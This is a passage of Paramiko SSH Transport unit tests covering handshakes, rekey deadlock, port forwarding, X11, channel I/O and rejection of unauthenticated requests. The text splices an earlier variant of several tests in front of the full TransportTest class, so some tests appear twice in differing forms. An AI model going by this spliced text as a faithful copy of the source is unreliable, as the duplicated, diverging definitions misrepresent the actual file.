        # In the main thread:
        #   1. The user's program calls Channel.send(), which sends
        #      MSG_CHANNEL_DATA to the remote host.
        #   2. Packetizer discovers that REKEY_BYTES has been exceeded, and
        #      sets the __need_rekey flag.
        #
        # In the Transport thread:
        #   3. Packetizer notices that the __need_rekey flag is set, and raises
        #      NeedRekeyException.
        #   4. In response to NeedRekeyException, the transport thread sends
        #      MSG_KEXINIT to the remote host.
        #
        # On the remote host (using any SSH implementation):
        #   5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST is sent.
        #   6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is sent.
        #
        # In the main thread:
        #   7. The user's program calls Channel.send().
        #   8. Channel.send acquires Channel.lock, then calls Transport._send_user_message().
        #   9. Transport._send_user_message waits for Transport.clear_to_send
        #      to be set (i.e., it waits for re-keying to complete).
        #      Channel.lock is still held.
        #
        # In the Transport thread:
        #   10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust
        #       is called to handle it.
        #   11. Channel._window_adjust tries to acquire Channel.lock, but it
        #       blocks because the lock is already held by the main thread.
        #
        # The result is that the Transport thread never processes the remote
        # host's MSG_KEXINIT packet, because it becomes deadlocked while
        # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message.

        # We set up two separate threads for sending and receiving packets,
        # while the main thread acts as a watchdog timer.  If the timer
        # expires, a deadlock is assumed.

        class SendThread(threading.Thread):
            def __init__(self, chan, iterations, done_event):
                threading.Thread.__init__(self, None, None, self.__class__.__name__)
                # Daemon (attribute form; setDaemon() is deprecated) so a
                # deadlocked thread does not keep the process alive.
                self.daemon = True
                self.chan = chan
                self.iterations = iterations
                self.done_event = done_event
                self.watchdog_event = threading.Event()

            def run(self):
                try:
                    for _ in range(self.iterations):
                        if self.done_event.is_set():
                            break
                        self.watchdog_event.set()
                        self.chan.send("x" * 2048)
                finally:
                    self.done_event.set()
                    self.watchdog_event.set()

        class ReceiveThread(threading.Thread):
            def __init__(self, chan, done_event):
                threading.Thread.__init__(self, None, None, self.__class__.__name__)
                self.daemon = True
                self.chan = chan
                self.done_event = done_event
                self.watchdog_event = threading.Event()

            def run(self):
                try:
                    while not self.done_event.is_set():
                        if self.chan.recv_ready():
                            # Read from this thread's own channel rather
                            # than the enclosing test's ``chan`` closure.
                            self.chan.recv(65536)
                            self.watchdog_event.set()
                        elif random.randint(0, 1):
                            # Randomized back-off to vary the interleaving.
                            time.sleep(random.randint(0, 500) / 1000.0)
                finally:
                    self.done_event.set()
                    self.watchdog_event.set()

        self.setup_test_server()
        self.ts.packetizer.REKEY_BYTES = 2048

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # Monkey patch the client's Transport._handler_table so that the client
        # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial
        # MSG_KEXINIT.  This is used to simulate the effect of network latency
        # on a real MSG_CHANNEL_WINDOW_ADJUST message.
        self.tc._handler_table = self.tc._handler_table.copy()  # copy per-class dictionary
        _negotiate_keys = self.tc._handler_table[MSG_KEXINIT]

        def _negotiate_keys_wrapper(self, m):
            if self.local_kex_init is None:  # Remote side sent KEXINIT
                # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it
                # before responding to the incoming MSG_KEXINIT.
                m2 = Message()
                m2.add_byte(cMSG_CHANNEL_WINDOW_ADJUST)
                m2.add_int(chan.remote_chanid)
                m2.add_int(1)    # bytes to add
                self._send_message(m2)
            return _negotiate_keys(self, m)

        self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper

        # Parameters for the test
        iterations = 500    # The deadlock does not happen every time, but it
                            # should after many iterations.
        timeout = 5

        # This event is set when the test is completed
        done_event = threading.Event()

        # Start the sending thread
        st = SendThread(schan, iterations, done_event)
        st.start()

        # Start the receiving thread
        rt = ReceiveThread(chan, done_event)
        rt.start()

        # Act as a watchdog timer: each thread must show progress within
        # ``timeout`` seconds, otherwise a deadlock is assumed.
        deadlocked = False
        while not deadlocked and not done_event.is_set():
            for event in (st.watchdog_event, rt.watchdog_event):
                event.wait(timeout)
                if done_event.is_set():
                    break
                if not event.is_set():
                    deadlocked = True
                    break
                event.clear()

        # Tell the threads to stop (if they haven't already stopped).  Note
        # that if one or more threads are deadlocked, they might hang around
        # forever (until the process exits).
        done_event.set()

        # Assertion: We must not have detected a timeout.
        self.assertFalse(deadlocked)

        # Close the channels
        schan.close()
        chan.close()

    def test_J_sanitze_packet_size(self):
        """
        verify that we conform to the rfc of packet and window sizes.
        """
        for val, correct in [(4095, MIN_PACKET_SIZE),
                             (None, DEFAULT_MAX_PACKET_SIZE),
                             (2**32, MAX_WINDOW_SIZE)]:
            self.assertEqual(self.tc._sanitize_packet_size(val), correct)

    def test_K_sanitze_window_size(self):
        """
        verify that we conform to the rfc of packet and window sizes.
        """
        for val, correct in [(32767, MIN_WINDOW_SIZE),
                             (None, DEFAULT_WINDOW_SIZE),
                             (2**32, MAX_WINDOW_SIZE)]:
            self.assertEqual(self.tc._sanitize_window_size(val), correct)

    def test_L_handshake_timeout(self):
        """
        verify that we can get a handshake timeout.
        """
        host_key = RSAKey.from_private_key_file(test_path('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertTrue(not event.is_set())
        # A near-zero timeout so the handshake cannot finish in time.
        self.tc.handshake_timeout = 0.000000000001
        self.ts.start_server(event, server)
        self.assertRaises(EOFError, self.tc.connect,
                          hostkey=public_host_key,
                          username='******',
                          password='******')
class TransportTest(unittest.TestCase):
    """
    Loopback tests for Transport.

    ``self.tc`` (client) and ``self.ts`` (server) are Transports built on two
    LoopSocket objects linked to each other in setUp, so the whole SSH
    exchange happens in-process.
    """

    def setUp(self):
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    def setup_test_server(
        self, client_options=None, server_options=None, connect_kwargs=None,
    ):
        """
        Start the server transport and connect the client to it.

        :param client_options: optional callable given the client's
            SecurityOptions before connecting.
        :param server_options: optional callable given the server's
            SecurityOptions before connecting.
        :param connect_kwargs: keyword arguments for ``self.tc.connect``;
            defaults to the test host key plus the test credentials.  Pass
            ``{}`` to connect without authenticating.
        """
        host_key = RSAKey.from_private_key_file(_support('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)

        if client_options is not None:
            client_options(self.tc.get_security_options())
        if server_options is not None:
            server_options(self.ts.get_security_options())

        event = threading.Event()
        self.server = NullServer()
        self.assertFalse(event.is_set())
        self.ts.start_server(event, self.server)
        if connect_kwargs is None:
            connect_kwargs = dict(
                hostkey=public_host_key,
                username='******',
                password='******',
            )
        self.tc.connect(**connect_kwargs)
        # The server sets ``event`` once negotiation finishes; allow 1 second.
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_1_security_options(self):
        o = self.tc.get_security_options()
        self.assertEqual(type(o), SecurityOptions)
        self.assertTrue(('aes256-cbc', 'blowfish-cbc') != o.ciphers)
        o.ciphers = ('aes256-cbc', 'blowfish-cbc')
        self.assertEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        # An unknown cipher name is rejected...
        with self.assertRaises(ValueError):
            o.ciphers = ('aes256-cbc', 'made-up-cipher')
        # ...and so is a value that is not a sequence of names.
        with self.assertRaises(TypeError):
            o.ciphers = 23

    def test_1b_security_options_reset(self):
        o = self.tc.get_security_options()
        # should not throw any exceptions
        o.ciphers = o.ciphers
        o.digests = o.digests
        o.key_types = o.key_types
        o.kex = o.kex
        o.compression = o.compression

    def test_2_compute_key(self):
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929
        self.tc.H = b'\x0C\x83\x07\xCD\xE6\x85\x6F\xF3\x0B\xA9\x36\x84\xEB\x0F\x04\xC2\x52\x0E\x9E\xD3'
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key('C', 32)
        self.assertEqual(
            b'207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995',
            hexlify(key).upper())

    def test_3_simple(self):
        """
        verify that we can establish an ssh link with ourselves across the
        loopback sockets.  this is hardly "simple" but it's simpler than the
        later tests. :)
        """
        host_key = RSAKey.from_private_key_file(_support('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        self.assertEqual(None, self.tc.get_username())
        self.assertEqual(None, self.ts.get_username())
        self.assertEqual(False, self.tc.is_authenticated())
        self.assertEqual(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())
        self.assertEqual('slowdive', self.tc.get_username())
        self.assertEqual('slowdive', self.ts.get_username())
        self.assertEqual(True, self.tc.is_authenticated())
        self.assertEqual(True, self.ts.is_authenticated())

    def test_3a_long_banner(self):
        """
        verify that a long banner doesn't mess up the handshake.
        """
        host_key = RSAKey.from_private_key_file(_support('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        # Push the banner into the server side before the server starts.
        self.socks.send(LONG_BANNER)
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_4_special(self):
        """
        verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        def force_algorithms(options):
            options.ciphers = ('aes256-cbc',)
            options.digests = ('hmac-md5-96',)
        self.setup_test_server(client_options=force_algorithms)
        self.assertEqual('aes256-cbc', self.tc.local_cipher)
        self.assertEqual('aes256-cbc', self.tc.remote_cipher)
        # hmac-md5-96 truncates the MAC to 96 bits == 12 bytes.
        self.assertEqual(12, self.tc.packetizer.get_mac_size_out())
        self.assertEqual(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    @slow
    def test_5_keepalive(self):
        """
        verify that the keepalive will be sent.
        """
        self.setup_test_server()
        self.assertEqual(None, getattr(self.server, '_global_request', None))
        self.tc.set_keepalive(1)
        time.sleep(2)
        self.assertEqual('*****@*****.**', self.server._global_request)

    def test_6_exec_command(self):
        """
        verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        with self.assertRaises(SSHException):
            chan.exec_command(b'command contains \xfc and is not a valid UTF-8 string')

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('', f.readline())
        f = chan.makefile_stderr()
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())

    def test_6a_channel_can_be_used_as_context_manager(self):
        """
        verify that a channel can be used as a context manager.
        """
        self.setup_test_server()

        with self.tc.open_session() as chan:
            with self.ts.accept(1.0) as schan:
                chan.exec_command('yes')
                schan.send('Hello there.\n')
                schan.close()

                f = chan.makefile()
                self.assertEqual('Hello there.\n', f.readline())
                self.assertEqual('', f.readline())

    def test_7_invoke_shell(self):
        """
        verify that invoke_shell() does something reasonable.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)
        chan.send('communist j. cat\n')
        f = schan.makefile()
        self.assertEqual('communist j. cat\n', f.readline())
        chan.close()
        self.assertEqual('', f.readline())

    def test_8_channel_exception(self):
        """
        verify that ChannelException is thrown for a bad open-channel request.
        """
        self.setup_test_server()
        try:
            self.tc.open_channel('bogus')
            self.fail('expected exception')
        except ChannelException as e:
            self.assertEqual(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED, e.code)

    def test_9_exit_status(self):
        """
        verify that get_exit_status() works.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        chan.exec_command('yes')
        schan.send('Hello there.\n')
        self.assertFalse(chan.exit_status_ready())
        # trigger an EOF
        schan.shutdown_read()
        schan.shutdown_write()
        schan.send_exit_status(23)
        schan.close()

        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('', f.readline())
        # Poll for up to ~5 seconds for the exit status to arrive.
        count = 0
        while not chan.exit_status_ready():
            time.sleep(0.1)
            count += 1
            if count > 50:
                self.fail("timeout")
        self.assertEqual(23, chan.recv_exit_status())
        chan.close()

    def test_A_select(self):
        """
        verify that select() on a channel works.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        # nothing should be ready
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.send('hello\n')

        # something should be ready now (give it 1 second to appear)
        for i in range(10):
            r, w, e = select.select([chan], [], [], 0.1)
            if chan in r:
                break
            time.sleep(0.1)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        self.assertEqual(b'hello\n', chan.recv(6))

        # and, should be dead again now
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.close()

        # detect eof?
        for i in range(10):
            r, w, e = select.select([chan], [], [], 0.1)
            if chan in r:
                break
            time.sleep(0.1)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)
        self.assertEqual(bytes(), chan.recv(16))

        # make sure the pipe is still open for now...
        p = chan._pipe
        self.assertEqual(False, p._closed)
        chan.close()
        # ...and now is closed.
        self.assertEqual(True, p._closed)

    def test_B_renegotiate(self):
        """
        verify that a transport can correctly renegotiate mid-stream.
        """
        self.setup_test_server()
        # A low rekey threshold makes the 20 KiB sent below trigger a rekey.
        self.tc.packetizer.REKEY_BYTES = 16384
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        self.assertEqual(self.tc.H, self.tc.session_id)
        for i in range(20):
            chan.send('x' * 1024)
        chan.close()

        # allow a few seconds for the rekeying to complete
        for i in range(50):
            if self.tc.H != self.tc.session_id:
                break
            time.sleep(0.1)
        self.assertNotEqual(self.tc.H, self.tc.session_id)

        schan.close()

    def test_C_compression(self):
        """
        verify that zlib compression is basically working.
        """
        def force_compression(o):
            o.compression = ('zlib',)
        self.setup_test_server(force_compression, force_compression)
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        sent_before = self.tc.packetizer._Packetizer__sent_bytes
        chan.send('x' * 1024)
        sent_after = self.tc.packetizer._Packetizer__sent_bytes
        sent = sent_after - sent_before
        block_size = self.tc._cipher_info[self.tc.local_cipher]['block-size']
        mac_size = self.tc._mac_info[self.tc.local_mac]['size']
        # tests show this is actually compressed to *52 bytes*!  including packet overhead!  nice!! :)
        self.assertTrue(sent < 1024)
        self.assertEqual(16 + block_size + mac_size, sent)

        chan.close()
        schan.close()

    def test_D_x11(self):
        """
        verify that an x11 port can be requested and opened.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        requested = []

        def handler(c, addr_port):
            addr, port = addr_port
            requested.append((addr, port))
            self.tc._queue_incoming_channel(c)

        self.assertEqual(None, getattr(self.server, '_x11_screen_number', None))
        cookie = chan.request_x11(0, single_connection=True, handler=handler)
        self.assertEqual(0, self.server._x11_screen_number)
        self.assertEqual('MIT-MAGIC-COOKIE-1', self.server._x11_auth_protocol)
        self.assertEqual(cookie, self.server._x11_auth_cookie)
        self.assertEqual(True, self.server._x11_single_connection)

        x11_server = self.ts.open_x11_channel(('localhost', 6093))
        x11_client = self.tc.accept()
        self.assertEqual('localhost', requested[0][0])
        self.assertEqual(6093, requested[0][1])

        x11_server.send('hello')
        self.assertEqual(b'hello', x11_client.recv(5))

        x11_server.close()
        x11_client.close()
        chan.close()
        schan.close()

    def test_E_reverse_port_forwarding(self):
        """
        verify that a client can ask the server to open a reverse port for
        forwarding.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        requested = []

        def handler(c, origin_addr_port, server_addr_port):
            requested.append(origin_addr_port)
            requested.append(server_addr_port)
            self.tc._queue_incoming_channel(c)

        # Port 0 asks for any free port; the server's listener reports which.
        port = self.tc.request_port_forward('127.0.0.1', 0, handler)
        self.assertEqual(port, self.server._listen.getsockname()[1])

        cs = socket.socket()
        cs.connect(('127.0.0.1', port))
        ss, _ = self.server._listen.accept()
        sch = self.ts.open_forwarded_tcpip_channel(ss.getsockname(), ss.getpeername())
        cch = self.tc.accept()

        sch.send('hello')
        self.assertEqual(b'hello', cch.recv(5))
        sch.close()
        cch.close()
        ss.close()
        cs.close()

        # now cancel it.
        self.tc.cancel_port_forward('127.0.0.1', port)
        self.assertIsNone(self.server._listen)

    def test_F_port_forwarding(self):
        """
        verify that a client can forward new connections from a locally-
        forwarded port.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # open a port on the "server" that the client will ask to forward to.
        greeting_server = socket.socket()
        greeting_server.bind(('127.0.0.1', 0))
        greeting_server.listen(1)
        greeting_port = greeting_server.getsockname()[1]

        cs = self.tc.open_channel('direct-tcpip', ('127.0.0.1', greeting_port), ('', 9000))
        sch = self.ts.accept(1.0)
        cch = socket.socket()
        cch.connect(self.server._tcpip_dest)

        ss, _ = greeting_server.accept()
        ss.send(b'Hello!\n')
        ss.close()
        sch.send(cch.recv(8192))
        sch.close()

        self.assertEqual(b'Hello!\n', cs.recv(7))
        cs.close()
        # Release the plain sockets opened by this test as well.
        cch.close()
        greeting_server.close()

    def test_G_stderr_select(self):
        """
        verify that select() on a channel works even if only stderr is
        receiving data.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        # nothing should be ready
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.send_stderr('hello\n')

        # something should be ready now (give it 1 second to appear)
        for i in range(10):
            r, w, e = select.select([chan], [], [], 0.1)
            if chan in r:
                break
            time.sleep(0.1)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        self.assertEqual(b'hello\n', chan.recv_stderr(6))

        # and, should be dead again now
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.close()
        chan.close()

    def test_H_send_ready(self):
        """
        verify that send_ready() indicates when a send would not block.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        self.assertEqual(chan.send_ready(), True)
        total = 0
        K = '*' * 1024
        limit = 1+(64 * 2 ** 15)
        # Keep sending without the server reading until the window fills.
        while total < limit:
            chan.send(K)
            total += len(K)
            if not chan.send_ready():
                break
        self.assertTrue(total < limit)

        schan.close()
        chan.close()
        self.assertEqual(chan.send_ready(), True)

    def test_I_rekey_deadlock(self):
        """
        Regression test for deadlock when in-transit messages are received after MSG_KEXINIT is sent

        Note: When this test fails, it may leak threads.
        """

        # Test for an obscure deadlocking bug that can occur if we receive
        # certain messages while initiating a key exchange.
        #
        # The deadlock occurs as follows:
        #
        # In the main thread:
        #   1. The user's program calls Channel.send(), which sends
        #      MSG_CHANNEL_DATA to the remote host.
        #   2. Packetizer discovers that REKEY_BYTES has been exceeded, and
        #      sets the __need_rekey flag.
        #
        # In the Transport thread:
        #   3. Packetizer notices that the __need_rekey flag is set, and raises
        #      NeedRekeyException.
        #   4. In response to NeedRekeyException, the transport thread sends
        #      MSG_KEXINIT to the remote host.
        #
        # On the remote host (using any SSH implementation):
        #   5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST is sent.
        #   6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is sent.
        #
        # In the main thread:
        #   7. The user's program calls Channel.send().
        #   8. Channel.send acquires Channel.lock, then calls Transport._send_user_message().
        #   9. Transport._send_user_message waits for Transport.clear_to_send
        #      to be set (i.e., it waits for re-keying to complete).
        #      Channel.lock is still held.
        #
        # In the Transport thread:
        #   10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust
        #       is called to handle it.
        #   11. Channel._window_adjust tries to acquire Channel.lock, but it
        #       blocks because the lock is already held by the main thread.
        #
        # The result is that the Transport thread never processes the remote
        # host's MSG_KEXINIT packet, because it becomes deadlocked while
        # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message.

        # We set up two separate threads for sending and receiving packets,
        # while the main thread acts as a watchdog timer.  If the timer
        # expires, a deadlock is assumed.

        class SendThread(threading.Thread):
            """Send 2 KiB chunks on ``chan``, pinging watchdog_event each time."""

            def __init__(self, chan, iterations, done_event):
                threading.Thread.__init__(self, None, None, self.__class__.__name__)
                self.daemon = True
                self.chan = chan
                self.iterations = iterations
                self.done_event = done_event
                self.watchdog_event = threading.Event()

            def run(self):
                try:
                    for _ in range(self.iterations):
                        if self.done_event.is_set():
                            break
                        self.watchdog_event.set()
                        self.chan.send("x" * 2048)
                finally:
                    # Always wake the watchdog so the main thread can finish.
                    self.done_event.set()
                    self.watchdog_event.set()

        class ReceiveThread(threading.Thread):
            """Drain ``chan`` at random intervals, pinging watchdog_event on each read."""

            def __init__(self, chan, done_event):
                threading.Thread.__init__(self, None, None, self.__class__.__name__)
                self.daemon = True
                self.chan = chan
                self.done_event = done_event
                self.watchdog_event = threading.Event()

            def run(self):
                try:
                    while not self.done_event.is_set():
                        if self.chan.recv_ready():
                            self.chan.recv(65536)
                            self.watchdog_event.set()
                        else:
                            # Random pauses vary the interleaving between runs.
                            if random.randint(0, 1):
                                time.sleep(random.randint(0, 500) / 1000.0)
                finally:
                    self.done_event.set()
                    self.watchdog_event.set()

        self.setup_test_server()
        self.ts.packetizer.REKEY_BYTES = 2048

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # Monkey patch the client's Transport._handler_table so that the client
        # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial
        # MSG_KEXINIT.  This is used to simulate the effect of network latency
        # on a real MSG_CHANNEL_WINDOW_ADJUST message.
        self.tc._handler_table = self.tc._handler_table.copy()  # copy per-class dictionary
        _negotiate_keys = self.tc._handler_table[MSG_KEXINIT]

        def _negotiate_keys_wrapper(self, m):
            if self.local_kex_init is None:  # Remote side sent KEXINIT
                # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it
                # before responding to the incoming MSG_KEXINIT.
                m2 = Message()
                m2.add_byte(cMSG_CHANNEL_WINDOW_ADJUST)
                m2.add_int(chan.remote_chanid)
                m2.add_int(1)    # bytes to add
                self._send_message(m2)
            return _negotiate_keys(self, m)
        self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper

        # Parameters for the test.
        # The deadlock does not happen every time, but it should after many
        # iterations.
        iterations = 500
        timeout = 5

        # This event is set when the test is completed
        done_event = threading.Event()

        # Start the sending thread
        st = SendThread(schan, iterations, done_event)
        st.start()

        # Start the receiving thread
        rt = ReceiveThread(chan, done_event)
        rt.start()

        # Act as a watchdog timer: each thread must ping its watchdog_event
        # at least once every ``timeout`` seconds, otherwise assume deadlock.
        deadlocked = False
        while not deadlocked and not done_event.is_set():
            for event in (st.watchdog_event, rt.watchdog_event):
                event.wait(timeout)
                if done_event.is_set():
                    break
                if not event.is_set():
                    deadlocked = True
                    break
                event.clear()

        # Tell the threads to stop (if they haven't already stopped).  Note
        # that if one or more threads are deadlocked, they might hang around
        # forever (until the process exits).
        done_event.set()

        # Assertion: We must not have detected a timeout.
        self.assertFalse(deadlocked)

        # Close the channels
        schan.close()
        chan.close()

    def test_J_sanitze_packet_size(self):
        """
        verify that we conform to the rfc of packet and window sizes.
        """
        for val, correct in [(4095, MIN_PACKET_SIZE),
                             (None, DEFAULT_MAX_PACKET_SIZE),
                             (2**32, MAX_WINDOW_SIZE)]:
            self.assertEqual(self.tc._sanitize_packet_size(val), correct)

    def test_K_sanitze_window_size(self):
        """
        verify that we conform to the rfc of packet and window sizes.
        """
        for val, correct in [(32767, MIN_WINDOW_SIZE),
                             (None, DEFAULT_WINDOW_SIZE),
                             (2**32, MAX_WINDOW_SIZE)]:
            self.assertEqual(self.tc._sanitize_window_size(val), correct)

    @slow
    def test_L_handshake_timeout(self):
        """
        verify that we can get a handshake timeout.
        """
        # Tweak client Transport instance's Packetizer instance so
        # its read_message() sleeps a bit. This helps prevent race conditions
        # where the client Transport's timeout timer thread doesn't even have
        # time to get scheduled before the main client thread finishes
        # handshaking with the server.
        # (Doing this on the server's transport *sounds* more 'correct' but
        # actually doesn't work nearly as well for whatever reason.)
        class SlowPacketizer(Packetizer):
            def read_message(self):
                time.sleep(1)
                return super(SlowPacketizer, self).read_message()
        # NOTE: prettttty sure since the replaced .packetizer Packetizer is now
        # no longer doing anything with its copy of the socket...everything'll
        # be fine. Even tho it's a bit squicky.
        self.tc.packetizer = SlowPacketizer(self.tc.sock)
        # Continue with regular test red tape.
        host_key = RSAKey.from_private_key_file(_support('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        self.tc.handshake_timeout = 0.000000000001
        self.ts.start_server(event, server)
        self.assertRaises(EOFError, self.tc.connect,
                          hostkey=public_host_key,
                          username='******',
                          password='******')

    def test_M_select_after_close(self):
        """
        verify that select works when a channel is already closed.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)
        schan.close()

        # give client a moment to receive close notification
        time.sleep(0.1)

        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

    def test_channel_send_misc(self):
        """
        verify behaviours sending various instances to a channel
        """
        self.setup_test_server()
        text = u"\xa7 slice me nicely"
        with self.tc.open_session() as chan:
            schan = self.ts.accept(1.0)
            if schan is None:
                self.fail("Test server transport failed to accept")
            sfile = schan.makefile()

            # TypeError raised on non string or buffer type
            self.assertRaises(TypeError, chan.send, object())
            self.assertRaises(TypeError, chan.sendall, object())

            # sendall() accepts a unicode instance
            chan.sendall(text)
            expected = text.encode("utf-8")
            self.assertEqual(sfile.read(len(expected)), expected)

    @needs_builtin('buffer')
    def test_channel_send_buffer(self):
        """
        verify sending buffer instances to a channel
        """
        self.setup_test_server()
        data = 3 * b'some test data\n whole'
        with self.tc.open_session() as chan:
            schan = self.ts.accept(1.0)
            if schan is None:
                self.fail("Test server transport failed to accept")
            sfile = schan.makefile()

            # send() accepts buffer instances
            sent = 0
            while sent < len(data):
                sent += chan.send(buffer(data, sent, 8))
            self.assertEqual(sfile.read(len(data)), data)

            # sendall() accepts a buffer instance
            chan.sendall(buffer(data))
            self.assertEqual(sfile.read(len(data)), data)

    @needs_builtin('memoryview')
    def test_channel_send_memoryview(self):
        """
        verify sending memoryview instances to a channel
        """
        self.setup_test_server()
        data = 3 * b'some test data\n whole'
        with self.tc.open_session() as chan:
            schan = self.ts.accept(1.0)
            if schan is None:
                self.fail("Test server transport failed to accept")
            sfile = schan.makefile()

            # send() accepts memoryview slices
            sent = 0
            view = memoryview(data)
            while sent < len(view):
                sent += chan.send(view[sent:sent+8])
            self.assertEqual(sfile.read(len(data)), data)

            # sendall() accepts a memoryview instance
            chan.sendall(memoryview(data))
            self.assertEqual(sfile.read(len(data)), data)

    def test_server_rejects_open_channel_without_auth(self):
        # self.fail/assertEqual instead of bare ``assert`` so the checks
        # survive ``python -O``.
        try:
            self.setup_test_server(connect_kwargs={})
            self.tc.open_session()
        except ChannelException as e:
            self.assertEqual(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED, e.code)
        else:
            self.fail("Did not raise ChannelException!")

    def test_server_rejects_arbitrary_global_request_without_auth(self):
        self.setup_test_server(connect_kwargs={})
        # NOTE: this dummy global request kind would normally pass muster
        # from the test server.
        self.tc.global_request('acceptable')
        # Global requests never raise exceptions, even on failure (not sure why
        # this was the original design...ugh.) Best we can do to tell failure
        # happened is that the client transport's global_response was set back
        # to None; if it had succeeded, it would be the response Message.
        err = "Unauthed global response incorrectly succeeded!"
        self.assertIsNone(self.tc.global_response, err)

    def test_server_rejects_port_forward_without_auth(self):
        # NOTE: at protocol level port forward requests are treated same as a
        # regular global request, but Paramiko server implements a special-case
        # method for it, so it gets its own test. (plus, THAT actually raises
        # an exception on the client side, unlike the general case...)
